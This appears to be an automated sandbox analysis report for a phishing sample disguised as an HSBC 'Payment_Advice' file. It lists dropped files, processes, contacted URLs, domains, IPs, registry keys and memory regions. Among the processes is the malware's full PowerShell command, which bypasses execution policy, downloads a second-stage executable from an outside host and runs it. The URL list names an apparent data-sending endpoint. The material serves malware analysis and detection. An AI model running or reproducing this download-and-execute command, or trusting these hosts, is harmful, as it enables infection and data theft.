Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Payment_Advice.scr.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\Public\Payment_Advice.pdf
|
PDF document, version 1.4, 1 pages
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs
|
data
|
dropped
|
|
|
|
C:\Windows\Temp\hadvices.scr
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0xb532ac29, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a0668ec5-4e89-4b5a-9eda-c2985324fe74.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240501131714Z-178.bmp
|
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 11
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6424
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 24
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.scr.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hadvices.scr.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI1a406.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ceh4mzno.4a1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzrk54o5.dkk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-01 15-17-11-905.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\1737b78a-138b-4575-9e85-395b8f616b4a.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\c5a735db-1617-4dde-a156-30851dbce141.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\e0ab29aa-2bff-4421-a708-3599d1536500.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\eeecf0b8-3932-4dbd-806b-a98e2ecda46d.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 46 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Payment_Advice.scr.exe
|
"C:\Users\user\Desktop\Payment_Advice.scr.exe"
|
|
|
|
C:\Users\user\Desktop\Payment_Advice.scr.exe
|
"C:\Users\user\Desktop\Payment_Advice.scr.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf'
-OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri
'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
|
|
|
|
C:\Windows\Temp\hadvices.scr
|
"C:\Windows\Temp\hadvices.scr" /S
|
|
|
|
C:\Windows\Temp\hadvices.scr
|
"C:\Windows\Temp\hadvices.scr"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2064 --field-trial-handle=1724,i,3043175899489958109,16137333913944032320,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://advising-receipts.com/hsbc/hadvices.scr
|
104.21.27.63
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://advising-receipts.com
|
unknown
|
|
|
|
https://advising-receipts.com/hsbc/Payment_Advice.pdf
|
104.21.27.63
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://advising-receipts.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://adviF.0
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://mail.qoldenfrontier.com
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
http://checkip.dyndns.org/
|
158.101.44.242
|
||
|
https://reallyfreegeoip.orgp
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/149.18.24.96
|
104.21.67.152
|
||
|
https://reallyfreegeoip.org/xml/149.18.24.96$
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://scratchdreams.tk
|
unknown
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://scratchdreams.tk/_send_.php?TS
|
172.67.169.18
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://scratchdreams.tk
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.qoldenfrontier.com
|
108.167.142.65
|
|
|
|
advising-receipts.com
|
104.21.27.63
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
reallyfreegeoip.org
|
104.21.67.152
|
||
|
scratchdreams.tk
|
172.67.169.18
|
||
|
checkip.dyndns.com
|
158.101.44.242
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
108.167.142.65
|
mail.qoldenfrontier.com
|
United States
|
|
|
|
104.21.27.63
|
advising-receipts.com
|
United States
|
|
|
|
23.210.0.138
|
unknown
|
United States
|
||
|
104.21.67.152
|
reallyfreegeoip.org
|
United States
|
||
|
172.67.169.18
|
scratchdreams.tk
|
United States
|
||
|
158.101.44.242
|
checkip.dyndns.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
aFS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tDIText
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileSource
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sFileAncestors
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uFileSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uPageCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sAssetId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
bisSharedFile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
aFS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tDIText
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tFileName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uFileSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uPageCount
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
FileDirectory
|
There are 41 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2D4C000
|
trusted library allocation
|
page read and write
|
|
|
|
3B26000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
2A71000
|
trusted library allocation
|
page read and write
|
|
|
|
889EB1A000
|
stack
|
page read and write
|
||
|
6649000
|
trusted library allocation
|
page read and write
|
||
|
1FA9657D000
|
heap
|
page read and write
|
||
|
C697E3A000
|
stack
|
page read and write
|
||
|
5500000
|
heap
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
1164000
|
trusted library allocation
|
page read and write
|
||
|
1FA9659A000
|
heap
|
page read and write
|
||
|
C37000
|
heap
|
page read and write
|
||
|
2858000
|
trusted library allocation
|
page read and write
|
||
|
21681604000
|
trusted library allocation
|
page read and write
|
||
|
24E14A8E000
|
heap
|
page read and write
|
||
|
5075000
|
trusted library allocation
|
page read and write
|
||
|
1755000
|
heap
|
page read and write
|
||
|
1160000
|
trusted library allocation
|
page read and write
|
||
|
24E1A200000
|
heap
|
page read and write
|
||
|
3A85000
|
trusted library allocation
|
page read and write
|
||
|
C69777E000
|
stack
|
page read and write
|
||
|
C0E000
|
stack
|
page read and write
|
||
|
5161000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
1FA9656C000
|
heap
|
page read and write
|
||
|
2C5B000
|
trusted library allocation
|
page read and write
|
||
|
24E19FB0000
|
trusted library allocation
|
page read and write
|
||
|
112E000
|
trusted library allocation
|
page read and write
|
||
|
21681C60000
|
trusted library allocation
|
page read and write
|
||
|
514B000
|
trusted library allocation
|
page read and write
|
||
|
CF806FE000
|
unkown
|
page readonly
|
||
|
24E19FE0000
|
trusted library allocation
|
page read and write
|
||
|
2C03000
|
trusted library allocation
|
page read and write
|
||
|
C75000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C22000
|
trusted library allocation
|
page read and write
|
||
|
C698C4F000
|
stack
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
2CC8000
|
trusted library allocation
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
D40000
|
trusted library allocation
|
page read and write
|
||
|
24E14A43000
|
heap
|
page read and write
|
||
|
4FC3000
|
heap
|
page read and write
|
||
|
24E14A2B000
|
heap
|
page read and write
|
||
|
1FA964D0000
|
heap
|
page read and write
|
||
|
2986000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
4FD2000
|
trusted library section
|
page read and write
|
||
|
2B79000
|
trusted library allocation
|
page read and write
|
||
|
C43000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA96670000
|
heap
|
page read and write
|
||
|
216F794B000
|
heap
|
page read and write
|
||
|
113D000
|
trusted library allocation
|
page read and write
|
||
|
2D63000
|
trusted library allocation
|
page read and write
|
||
|
D76000
|
trusted library allocation
|
page execute and read and write
|
||
|
CF80AFE000
|
unkown
|
page readonly
|
||
|
51D0000
|
trusted library allocation
|
page read and write
|
||
|
21681B53000
|
trusted library allocation
|
page read and write
|
||
|
1FA965AE000
|
heap
|
page read and write
|
||
|
51C0000
|
trusted library allocation
|
page read and write
|
||
|
1777000
|
heap
|
page read and write
|
||
|
1FA96790000
|
heap
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
1FA96551000
|
heap
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
24E19FB0000
|
trusted library allocation
|
page read and write
|
||
|
519A000
|
trusted library allocation
|
page read and write
|
||
|
3C1F000
|
stack
|
page read and write
|
||
|
2D71000
|
trusted library allocation
|
page read and write
|
||
|
7DF40CE10000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E15BB0000
|
trusted library section
|
page readonly
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BDA000
|
trusted library allocation
|
page read and write
|
||
|
2844000
|
trusted library allocation
|
page read and write
|
||
|
2840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
2B75000
|
trusted library allocation
|
page read and write
|
||
|
116D000
|
trusted library allocation
|
page execute and read and write
|
||
|
CF808FE000
|
unkown
|
page readonly
|
||
|
FE4000
|
heap
|
page read and write
|
||
|
24E1A24F000
|
heap
|
page read and write
|
||
|
F3E000
|
heap
|
page read and write
|
||
|
1FA965D1000
|
heap
|
page read and write
|
||
|
D53000
|
trusted library allocation
|
page execute and read and write
|
||
|
216F78F7000
|
heap
|
page execute and read and write
|
||
|
24E15BC0000
|
trusted library section
|
page readonly
|
||
|
1FA965B3000
|
heap
|
page read and write
|
||
|
21681B28000
|
trusted library allocation
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
6680000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C50000
|
heap
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
216F7315000
|
heap
|
page read and write
|
||
|
CFFF8FC000
|
stack
|
page read and write
|
||
|
2BBD000
|
trusted library allocation
|
page read and write
|
||
|
51A0000
|
trusted library allocation
|
page read and write
|
||
|
216F56F7000
|
heap
|
page read and write
|
||
|
24E1A090000
|
trusted library allocation
|
page read and write
|
||
|
CFFF5FE000
|
unkown
|
page readonly
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
FD6000
|
heap
|
page read and write
|
||
|
501A000
|
trusted library allocation
|
page read and write
|
||
|
2BF5000
|
trusted library allocation
|
page read and write
|
||
|
889F5FE000
|
stack
|
page read and write
|
||
|
21681B38000
|
trusted library allocation
|
page read and write
|
||
|
6730000
|
trusted library allocation
|
page read and write
|
||
|
C5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
154E000
|
stack
|
page read and write
|
||
|
4CEE000
|
stack
|
page read and write
|
||
|
C4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
2C31000
|
trusted library allocation
|
page read and write
|
||
|
2BCD000
|
trusted library allocation
|
page read and write
|
||
|
62ED000
|
stack
|
page read and write
|
||
|
1FA96568000
|
heap
|
page read and write
|
||
|
92B000
|
stack
|
page read and write
|
||
|
192E000
|
stack
|
page read and write
|
||
|
24E15BD0000
|
trusted library section
|
page readonly
|
||
|
1022000
|
heap
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
E16000
|
trusted library allocation
|
page read and write
|
||
|
24E1A100000
|
trusted library allocation
|
page read and write
|
||
|
24E1A30A000
|
heap
|
page read and write
|
||
|
5210000
|
heap
|
page read and write
|
||
|
7FFD34764000
|
trusted library allocation
|
page read and write
|
||
|
24E1B000000
|
heap
|
page read and write
|
||
|
7FFD34942000
|
trusted library allocation
|
page read and write
|
||
|
2CC2000
|
trusted library allocation
|
page read and write
|
||
|
4FCF000
|
trusted library section
|
page read and write
|
||
|
24E15BA0000
|
trusted library section
|
page readonly
|
||
|
24E15AA0000
|
trusted library allocation
|
page read and write
|
||
|
24E19FF4000
|
trusted library allocation
|
page read and write
|
||
|
24E15202000
|
heap
|
page read and write
|
||
|
53A0000
|
heap
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
2B38000
|
trusted library allocation
|
page read and write
|
||
|
1FA982A0000
|
heap
|
page read and write
|
||
|
24E19FB1000
|
trusted library allocation
|
page read and write
|
||
|
632E000
|
stack
|
page read and write
|
||
|
6070000
|
heap
|
page read and write
|
||
|
24E1A261000
|
heap
|
page read and write
|
||
|
21681C7B000
|
trusted library allocation
|
page read and write
|
||
|
CF803FE000
|
unkown
|
page readonly
|
||
|
2B25000
|
